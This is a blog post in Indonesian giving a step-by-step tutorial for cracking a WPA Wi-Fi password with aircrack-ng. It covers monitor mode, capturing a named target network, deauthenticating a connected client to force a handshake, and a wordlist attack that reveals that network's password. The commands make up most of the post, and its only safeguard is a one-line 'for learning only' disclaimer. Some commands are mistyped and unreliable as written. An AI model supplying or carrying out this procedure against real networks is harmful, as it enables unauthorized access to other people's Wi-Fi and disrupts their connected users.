Skip to main content

Hack Wifi With Kali Linux ( Aircrack )

Hallo Semua balik lagi bareng gue Rizky. Kali ini gue mau coba bahas dan ngasih tau cara - cara hack wifi di kali linux menggunakan aircrack. 
Aircrack merupakan salah satu tools yang sudah tersedia dikali linux yang bisa kita pakai untuk menemukan atau meng hack password wifi yang menjadi target kita.
Tapi sebelum memulai saya ingatkan dengan tegas " HAL INI HANYA UNTUK BELAJAR BUKAN UNTUK KEJAHATAN " apabila kalian gunakan unutk kejahatan kalian yang harus tanggung resikonya sendiri.
Ok kita mulai aja




1. Buka terminal atau Console kemudian posisikan di root bisa dengan cara ketik "su" atau "sudo"
2.Setelah terminal terbuka selanjutnya kita bisa ketikan " airmon -ng start wlan0 " wlan0 adalah adafter wifi kita kalian bisa cek menggunakan printah ifconfig
3. setelah itu wlan0 akan berubah menjadi wlan0mon atau mode monitor. selanjutnya ketikan printah "airodump-ng wlan0mon" printah tersebut berfungsi untuk memonitor wifi yang tersedia lengkap dengan client yang tersambung.
Setelah melihat wifi yang tersedia selanjutnya tentukan wifi target diatas saya coba filih wifi INOSOFT dengan chanel 1

4. Setelah mendapat nama ssid atau wifi target selanjutya gunakan printah ini "airodump-ng --bssid (bssid) -c (channel) -w (tempat file hasil capture akan disimpan) (interfaces)"

airodump-ng --bssid F8:1A:67:61:EE:10 -c 1 -w Documents/Aircrack wlan0mon
5. Sekarang buka terminal baru dan ketikan printah "aireplay-ng -0 2 -a F8:1A:67:61:EE:10 -c (pilih salah satu station) wlan0mon" posisi tetap pada root terminal. seperti contoh dibawah ini
Jika berhasil maka pada terminal pertama akan muncul tulisan WPA handshake kemudian tekan CTRL + C untuk stop

6. Selanjutnya kita masuk ketahap akhir unuk mencocokan password dari wordlist yang kita punya dengan yang berhasil kita dapatkan unutk ditampilkan dengan printah "aircrack -a2 -w Documents/Wordlist/wordlist.txt -b F8:1A:67:61:EE:10 Documents/Aircrack *.cap" dan hasilnya akan seperti dibawah ini password dari wifi targetkita telah ditemukan yaitu "kapalselam".
tapi sebelum itu kalian harus tau dulu apa itu wordlist, wordlist adalah kombinasi password yang telah kita sediakan sebelumnya bida dengan cara download ataupun dengan membuatnya sendiri dengan metode persuasi dengan kata lain apabila wordlist yang kalian punya tidak complete maka tidak akan ada hasilnya dan kebanyakan di internet biasanya wordlistnya tidak complete mungkin kalau hanya untuk kombinasi angka masih banyak namun ketika kombinasinya sulit tidak akan ketemu.









Comments